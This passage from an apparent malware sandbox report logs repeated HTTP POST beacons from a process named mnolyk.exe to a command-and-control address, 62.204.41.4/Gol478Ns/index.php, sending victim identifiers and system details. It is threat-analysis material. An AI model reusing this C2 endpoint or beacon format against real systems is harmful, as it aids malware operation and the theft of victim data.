                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:19.576844931 CET235INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          109192.168.2.64983062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:19.753947020 CET236OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:19.816864014 CET236INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          11192.168.2.64972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:53.543428898 CET116OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:53.607263088 CET116INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          110192.168.2.64983162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:19.998059988 CET237OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:20.060909033 CET237INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          111192.168.2.64983262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:20.240758896 CET238OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:20.305460930 CET238INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          112192.168.2.64983362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:20.483012915 CET239OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:20.547585011 CET239INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          113192.168.2.64983462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:20.722457886 CET240OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:20.785341024 CET240INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          114192.168.2.64983562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:20.965850115 CET241OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:21.028662920 CET241INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          115192.168.2.64983662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:21.202537060 CET242OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:21.268675089 CET242INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          116192.168.2.64983762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:21.459259987 CET243OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:21.520694971 CET243INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          117192.168.2.64983862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:21.703798056 CET244OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:21.767724037 CET244INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          118192.168.2.64983962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:21.949196100 CET245OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:22.013309002 CET245INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          119192.168.2.64984062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:22.187784910 CET246OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:22.253473997 CET246INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          12192.168.2.64973062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:53.793502092 CET117OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:53.858115911 CET117INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          120192.168.2.64984162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:22.423645973 CET247OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:22.488256931 CET247INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          121192.168.2.64984262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:22.668684959 CET248OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:22.732220888 CET248INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          122192.168.2.64984362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:22.907370090 CET249OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:22.972731113 CET249INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          123192.168.2.64984462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:23.138925076 CET249OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:23.204888105 CET250INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          124192.168.2.64984562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:23.372817039 CET251OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:23.434403896 CET251INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          125192.168.2.64984662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:23.606580973 CET252OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:23.677861929 CET252INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          126192.168.2.64984762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:23.854307890 CET253OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:23.918473005 CET253INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          127192.168.2.64984862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:24.096024990 CET254OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
